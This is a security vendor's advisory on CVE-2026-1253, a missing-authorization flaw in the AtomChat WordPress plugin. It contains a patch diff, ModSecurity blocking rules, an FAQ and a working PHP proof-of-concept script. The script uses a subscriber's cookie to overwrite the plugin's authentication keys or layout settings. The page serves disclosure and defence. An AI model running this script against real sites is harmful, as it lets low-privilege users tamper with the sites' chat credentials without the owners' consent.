-if(!empty($_REQUEST['api']) && $_REQUEST['api'] == 'atomchat_friend_ajax') {
-	atomchat_friend_ajax();
-}
-if(!empty($_REQUEST['api']) && $_REQUEST['api'] == 'atomchat_mycred_setting') {
-	atomchat_mycred_setting();
-}
-if(!empty($_REQUEST['api']) && $_REQUEST['api'] == 'atomchat_update_credeits') {
-	atomchat_update_credeits();
+	update_option( 'show_docked_layout_on_all_pages', $show_docked_layout_on_all_pages );
+	update_option( 'show_name_in_chat', $show_name_in_chat );
+
+	wp_send_json_success( array( 'success' => 'layout settings updated successfully' ) );
 }
-if(!empty($_REQUEST['api']) && $_REQUEST['api'] == 'atomchat_update_auth_ajax') {
-	atomchat_update_auth_ajax();
+
+/**
+ * Handle AtomChat license check.
+ */
+function atomchat_check_license_key_ajax() {
+	global $wpdb;
+
+	atomchat_verify_admin_ajax( 'atomchat_admin_action' );
+
+	$licensekey = isset( $_POST['licensekey'] ) ? sanitize_text_field( wp_unslash( $_POST['licensekey'] ) ) : '';
+	$update     = new AtomChatInstaller(
+		array(
+			'licensekey'  => $licensekey,
+			'integration' => 'wordpress',
+			'wpdb'        => $wpdb,
+		)
+	);
+
+	$update->atomchatCheckLicenseKey();
 }
-if(!empty($_REQUEST['api']) && $_REQUEST['api'] == 'atomchat_update_layout_ajax') {
-	atomchat_update_layout_ajax();
-}
 No newline at end of file
+
+add_action( 'wp_ajax_atomchatCheckLicenseKey', 'atomchat_check_license_key_ajax' );
+add_action( 'wp_ajax_atomchat_friend_ajax', 'atomchat_friend_ajax' );
+add_action( 'wp_ajax_atomchat_mycred_setting', 'atomchat_mycred_setting' );
+add_action( 'wp_ajax_atomchat_update_credeits', 'atomchat_update_credeits' );
+add_action( 'wp_ajax_atomchat_update_auth_ajax', 'atomchat_update_auth_ajax' );
+add_action( 'wp_ajax_atomchat_update_layout_ajax', 'atomchat_update_layout_ajax' );
--- a/atomchat/installer.php
+++ b/atomchat/installer.php
@@ -8,12 +8,21 @@
 	* wp_enqueue_style, wp_enqueue_script and esc_url
 */

-wp_enqueue_style("installer", plugin_dir_url( __FILE__ ).'css/installer.css');
+$atomchat_asset_version = defined( 'ATOMCHAT_VERSION' ) ? ATOMCHAT_VERSION : '1.1.8';

-wp_enqueue_script("installer", plugin_dir_url( __FILE__ ).'js/installer.js');
+wp_enqueue_style( "installer", plugin_dir_url( __FILE__ ) . 'css/installer.css', array(), $atomchat_asset_version );
+
+wp_enqueue_script( "installer", plugin_dir_url( __FILE__ ) . 'js/installer.js', array(), $atomchat_asset_version, false );
+wp_localize_script(
+	'installer',
+	'atomchatInstaller',
+	array(
+		'nonce' => wp_create_nonce( 'atomchat_admin_action' ),
+	)
+);
 wp_enqueue_script('jquery');
 if(!function_exists('curl_init')){
-	wp_enqueue_script("jqcurl", plugin_dir_url( __FILE__ ).'js/checkcurl.js');
+	wp_enqueue_script( "jqcurl", plugin_dir_url( __FILE__ ) . 'js/checkcurl.js', array(), $atomchat_asset_version, false );
 }
 //$atomchat_logo = esc_url(plugin_dir_url(__FILE__).'images/atom_chat_black_icon_logo.png');
 $atomchat_logo = esc_url(plugin_dir_url(__FILE__).'images/atomchat_final_logo.svg');
@@ -88,4 +97,4 @@
 	</div>
 </body>

-</html>
 No newline at end of file
+</html>

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

# Atomic Edge WAF Rule - CVE-2026-1253
SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" 
  "id:1001253,phase:2,deny,status:403,chain,msg:'CVE-2026-1253 via AtomChat AJAX - Missing Authorization',severity:'CRITICAL',tag:'CVE-2026-1253',tag:'WordPress',tag:'AtomChat'"
  SecRule ARGS_POST:api "@streq atomchat_update_auth_ajax" "chain"
    SecRule &ARGS_POST:atomchat_auth_key "!@eq 0" "chain"
      SecRule REQUEST_COOKIES:/wordpress_logged_in_/ "!@rx ^.*$" 
        "t:none,setvar:'tx.cve_2026_1253_score=+%{tx.critical_anomaly_score}',setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"

SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" 
  "id:1001254,phase:2,deny,status:403,chain,msg:'CVE-2026-1253 via AtomChat AJAX - Missing Authorization',severity:'CRITICAL',tag:'CVE-2026-1253',tag:'WordPress',tag:'AtomChat'"
  SecRule ARGS_POST:api "@streq atomchat_update_layout_ajax" "chain"
    SecRule &ARGS_POST:show_docked_layout_on_all_pages "!@eq 0" "chain"
      SecRule REQUEST_COOKIES:/wordpress_logged_in_/ "!@rx ^.*$" 
        "t:none,setvar:'tx.cve_2026_1253_score=+%{tx.critical_anomaly_score}',setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-1253 - Group Chat & Video Chat by AtomChat <= 1.1.7 - Missing Authorization to Authenticated (Subscriber+) Plugin Options Update

<?php
/**
 * Proof of Concept for CVE-2026-1253
 * Requires valid WordPress authentication cookie for a Subscriber or higher role
 */

$target_url = 'https://vulnerable-site.com/wp-admin/admin-ajax.php';
$cookie = 'wordpress_logged_in_xxxx=xxxx'; // Replace with valid auth cookie

// Option 1: Update authentication keys
$payload_auth = [
    'api' => 'atomchat_update_auth_ajax',
    'atomchat_auth_key' => 'malicious_auth_key',
    'atomchat_api_key' => 'malicious_api_key'
];

// Option 2: Update layout settings
$payload_layout = [
    'api' => 'atomchat_update_layout_ajax',
    'show_docked_layout_on_all_pages' => 'false',
    'show_name_in_chat' => 'false'
];

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($payload_auth)); // Change to $payload_layout for layout attack
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HTTPHEADER, [
    'Cookie: ' . $cookie,
    'Content-Type: application/x-www-form-urlencoded'
]);

$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

echo "HTTP Status: $http_coden";
echo "Response: $responsen";

// Check for success
if (strpos($response, 'success') !== false && strpos($response, 'auth key updated') !== false) {
    echo "[+] Authentication keys successfully modifiedn";
} elseif (strpos($response, 'success') !== false && strpos($response, 'layout settings') !== false) {
    echo "[+] Layout settings successfully modifiedn";
} else {
    echo "[-] Exploit failed or site is patchedn";
}
?>

Frequently Asked Questions

What is CVE-2026-1253?
Overview of the vulnerability
CVE-2026-1253 is a vulnerability in the Group Chat & Video Chat by AtomChat plugin for WordPress, specifically versions up to and including 1.1.7. It allows authenticated users with Subscriber-level access to modify plugin options due to missing capability checks in certain AJAX functions.
How does this vulnerability work?
Mechanics of the exploit
The vulnerability arises from the absence of authorization checks in the ‘atomchat_update_auth_ajax’ and ‘atomchat_update_layout_ajax’ functions. Authenticated users can send POST requests to update critical plugin settings, including API keys and layout configurations, without proper permissions.
Who is affected by this vulnerability?
Identifying vulnerable users
Any WordPress site using the Group Chat & Video Chat by AtomChat plugin version 1.1.7 or earlier is affected. Specifically, authenticated users with Subscriber-level access or higher can exploit this vulnerability.
How can I check if my site is vulnerable?
Steps to identify vulnerability
To check if your site is vulnerable, verify the version of the AtomChat plugin installed. If it is version 1.1.7 or earlier, your site is at risk. Additionally, you can review user roles to see if any authenticated users have Subscriber-level access.
What is the severity of CVE-2026-1253?
Understanding the risk level
CVE-2026-1253 has a CVSS score of 5.3, indicating a medium severity level. This means while the vulnerability does not grant full administrative access, it allows significant unauthorized modifications that can compromise the integrity of the plugin.
How can I fix this vulnerability?
Recommended actions
To mitigate this vulnerability, update the AtomChat plugin to version 1.1.8 or later, where the issue has been patched. It is also advisable to review user roles and permissions to limit access to sensitive settings.
What does the patch for this vulnerability include?
Details of the security update
The patch for CVE-2026-1253 introduces a centralized security function that verifies user capabilities and checks for nonces. It restructures the code to use proper WordPress AJAX action hooks, ensuring only authorized users can modify plugin settings.
What practical risks does this vulnerability pose?
Potential impacts of exploitation
If exploited, this vulnerability allows an attacker to change critical settings such as API keys and authentication keys, potentially disrupting chat services or enabling unauthorized access. Additionally, attackers can alter layout settings, impacting the user interface.
What is a proof of concept in this context?
Understanding the demonstration of the vulnerability
The proof of concept for CVE-2026-1253 is a script that demonstrates how an attacker can exploit the vulnerability by sending crafted POST requests to the vulnerable AJAX endpoints. It requires a valid WordPress authentication cookie, showcasing the ease of exploitation.
How can I further secure my WordPress site against vulnerabilities?
Best practices for WordPress security
To enhance security, regularly update all plugins and themes, implement strong user role management, and use security plugins that monitor for unauthorized changes. Additionally, consider conducting periodic security audits to identify and remediate vulnerabilities.
Is this vulnerability common in WordPress plugins?
Context of vulnerabilities in plugins
While vulnerabilities can occur in any software, plugins with insufficient access controls are particularly susceptible. It is essential for developers to implement proper security measures and for administrators to stay informed about vulnerabilities affecting their installed plugins.
Where can I find more information about CVE-2026-1253?
Resources for further reading
Detailed information about CVE-2026-1253 can be found on the official CVE database and security advisory sites. Additionally, the plugin’s changelog and support forums may provide insights into the vulnerability and its resolution.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations